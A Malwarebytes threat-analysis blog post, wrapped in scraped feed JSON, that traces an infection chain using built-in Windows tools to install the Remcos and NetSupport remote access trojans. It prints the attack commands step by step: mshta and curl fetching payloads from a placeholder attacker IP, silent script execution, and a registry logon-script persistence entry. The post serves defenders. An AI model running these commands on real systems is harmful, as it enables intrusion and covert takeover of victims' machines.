{“lastseen”:”2026-01-21T18:05:12″,”description”:”Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving off the land\u201d approach to the extreme.\\n\\nThe end goal was to deploy **Remcos** , a Remote Access Trojan (RAT), and **NetSupport Manager** , a legitimate remote administration tool that\u2019s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows\u2019 built-in utilities\u2014known as **LOLBins** (Living Off the Land Binaries).\\n\\nBoth Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.\\n\\nRemcos (short for Remote Control \\u0026 Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.\\n\\nNetSupport Manager is a legitimate remote support product that becomes \u201cNetSupport RAT\u201d when attackers silently install and configure it for unauthorized access.\\n\\nLet\u2019s walk through how this attack unfolded, one native command at a time.\\n\\n### **Stage 1: The subtle initial access**\\n\\nThe attack kicked off with a seemingly odd command:\\n\\n`C:\\\\Windows\\\\System32\\\\forfiles.exe \/p c:\\\\windows\\\\system32 \/m notepad.exe \/c \\”cmd \/c start mshta http:\/\/[attacker-ip]\/web\\”`\\n\\nAt first glance, you might wonder: why not just run `mshta.exe` directly? The answer lies in defense evasion. \\n\\nBy roping in `forfiles.exe`, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that\u2019s less likely to trip alarms.\\n\\n### **Stage 2: Fileless download and staging**\\n\\nThe `mshta` command fetched a remote HTA file that immediately spawned `cmd.exe,` which rolled out an elaborate PowerShell one-liner:\\n\\n`powershell.exe -NoProfile -Command`\\n\\n`curl -s -L -o \\”\\u003crandom\\u003e.pdf\\” (attacker-ip}\/socket;`\\n\\n`mkdir \\”\\u003crandom\\u003e\\”;`\\n\\n`tar -xf \\”\\u003crandom\\u003e.pdf\\” -C \\”\\u003crandom\\u003e\\”;`\\n\\n`Invoke-CimMethod Win32_Process Create \\”\\u003crandom\\u003e\\\\glaxnimate.exe\\”`\\n\\nHere’s what that does:\\n\\nPowerShell\u2019s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, `tar.exe` (another trusted Windows add-on) unpacked it into a randomly named folder. The star of this show, however, was `glaxnimate.exe`\u2014a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows’ own tools\u2014no EXE droppers or macros in sight.\\n\\n### **Stage 3: Staging in plain sight**\\n\\nWhat happened next? The malicious Glaxnimate copy began writing partial files to `C:\\\\ProgramData`:\\n\\n * `SETUP.CAB.PART`\\n * `PROCESSOR.VBS.PART`\\n * `PATCHER.BAT.PART`\\n\\n\\n\\nWhy `.PART` files? It\u2019s classic malware staging. Drop files in a half-finished state until the time is right\u2014or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.\\n\\nScripting the core elements of infection\\n\\n### **Stage 4: Scripting the launch**\\n\\nMalware loves a good script\u2014especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:\\n\\n`\\”C:\\\\Windows\\\\System32\\\\WScript.exe\\” \\”C:\\\\ProgramData\\\\processor.vbs\\”`\\n\\nThe VBScript used IWshShell3.Run to silently spawn `cmd.exe` with a hidden window so the victim would never see a pop-up or black box. \\n\\n`IWshShell3.Run(\\”cmd.exe \/c %ProgramData%\\\\patcher.bat\\”, \\”0\\”, \\”false\\”);`\\n\\nThe batch file’s job?\\n\\n`expand setup.cab -F:* C:\\\\ProgramData`\\n\\nUse the `expand` utility to extract all the contents of the previously dropped `setup.cab` archive into ProgramData\u2014effectively unpacking the NetSupport RAT and its helpers.\\n\\n### **Stage 5: Hidden persistence**\\n\\nTo make sure their tool survived a restart, the attackers opted for the stealthy registry route:\\n\\n`reg add \\”HKCU\\\\Environment\\” \/v UserInitMprLogonScript \/t REG_EXPAND_SZ \/d \\”C:\\\\ProgramData\\\\PATCHDIRSEC\\\\client32.exe\\” \/f`\\n\\nUnlike old-school Run keys, `UserInitMprLogonScript` isn\u2019t a usual suspect and doesn’t open visible windows. Every time the user logged in, the RAT came quietly along for the ride.\\n\\n## Final thoughts\\n\\nThis infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows\u2019 own tools against its users. Every step of the way relies on built-in Windows tools: `forfiles`, `mshta`, `curl`, `tar`, scripting engines, `reg`, and `expand`.\\n\\nSo, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is \u201cnot yet.\u201d But each additional step adds noise, and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.\\n\\n**Stay vigilant. Monitor potential LOLBin abuse. And never trust a`.pdf` that needs `tar.exe` to open.**\\n\\nDespite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. It blocked the attacker\u2019s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.\\n\\n\\n\\n* * *\\n\\n**We don\u2019t just report on threats\u2014we remove them**\\n\\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.”,”published”:”2026-01-21T17:04:06″,”modified”:”2026-01-21T17:04:06″,”type”:”malwarebytes”,”title”:”Can you use too many LOLBins to drop some RATs?”,”source”:””,”references”:””,”id”:”MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA”,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.malwarebytes.com\/blog\/news\/2026\/01\/can-you-use-too-many-lolbins-to-drop-some-rats”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-21T18:05:12″,”description”:”Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,115,13,33,7,11,5],"class_list":["post-36724","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-malwarebytes","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n